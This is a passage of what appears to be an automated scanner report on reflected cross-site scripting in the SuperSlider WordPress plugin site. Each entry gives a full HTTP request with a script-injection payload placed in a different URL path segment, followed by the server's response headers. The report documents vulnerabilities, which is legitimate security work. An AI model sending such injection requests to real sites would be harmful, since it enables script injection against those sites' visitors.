Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674560+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674560; expires=Thu, 02-Feb-2012 19:22:40 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac9e"><script>alert(1)</script>d90ed1acbd5 was submitted in the REST URL parameter 2. This input was echoed as aac9e\"><script>alert(1)</script>d90ed1acbd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentaac9e"><script>alert(1)</script>d90ed1acbd5/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674562; expires=Thu, 02-Feb-2012 19:22:42 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8332"><script>alert(1)</script>7ad48b4bc3b was submitted in the REST URL parameter 3. This input was echoed as a8332\"><script>alert(1)</script>7ad48b4bc3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsa8332"><script>alert(1)</script>7ad48b4bc3b/superslider-show/plugin-data/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a062d"><script>alert(1)</script>5479a44adae was submitted in the REST URL parameter 4. This input was echoed as a062d\"><script>alert(1)</script>5479a44adae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-showa062d"><script>alert(1)</script>5479a44adae/plugin-data/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf811"><script>alert(1)</script>3f0521f2648 was submitted in the REST URL parameter 5. This input was echoed as cf811\"><script>alert(1)</script>3f0521f2648 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-datacf811"><script>alert(1)</script>3f0521f2648/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16c7"><script>alert(1)</script>0518058665f was submitted in the REST URL parameter 6. This input was echoed as c16c7\"><script>alert(1)</script>0518058665f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/supersliderc16c7"><script>alert(1)</script>0518058665f/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0ac"><script>alert(1)</script>6823b746046 was submitted in the REST URL parameter 7. This input was echoed as cb0ac\"><script>alert(1)</script>6823b746046 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShowcb0ac"><script>alert(1)</script>6823b746046/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7485"><script>alert(1)</script>4c6d54f9ffe was submitted in the REST URL parameter 8. This input was echoed as f7485\"><script>alert(1)</script>4c6d54f9ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/defaultf7485"><script>alert(1)</script>4c6d54f9ffe/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674574; expires=Thu, 02-Feb-2012 19:22:54 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d29d"><script>alert(1)</script>086bd3cb201 was submitted in the REST URL parameter 9. This input was echoed as 6d29d\"><script>alert(1)</script>086bd3cb201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css6d29d"><script>alert(1)</script>086bd3cb201 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674576+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674576; expires=Thu, 02-Feb-2012 19:22:56 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c215d"><script>alert(1)</script>2a891610468 was submitted in the REST URL parameter 1. This input was echoed as c215d\"><script>alert(1)</script>2a891610468 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitec215d"><script>alert(1)</script>2a891610468/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34007"><script>alert(1)</script>c24b863bac was submitted in the REST URL parameter 2. This input was echoed as 34007\"><script>alert(1)</script>c24b863bac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content34007"><script>alert(1)</script>c24b863bac/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 888b9"><script>alert(1)</script>1856c8b9929 was submitted in the REST URL parameter 3. This input was echoed as 888b9\"><script>alert(1)</script>1856c8b9929 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins888b9"><script>alert(1)</script>1856c8b9929/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 744e0"><script>alert(1)</script>c4cb7786a57 was submitted in the REST URL parameter 4. This input was echoed as 744e0\"><script>alert(1)</script>c4cb7786a57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show744e0"><script>alert(1)</script>c4cb7786a57/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674570; expires=Thu, 02-Feb-2012 19:22:50 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 479a5"><script>alert(1)</script>22d092f232f was submitted in the REST URL parameter 5. This input was echoed as 479a5\"><script>alert(1)</script>22d092f232f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data479a5"><script>alert(1)</script>22d092f232f/superslider/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674573+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d53"><script>alert(1)</script>fd42f611c98 was submitted in the REST URL parameter 6. This input was echoed as a0d53\"><script>alert(1)</script>fd42f611c98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslidera0d53"><script>alert(1)</script>fd42f611c98/ssShow/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
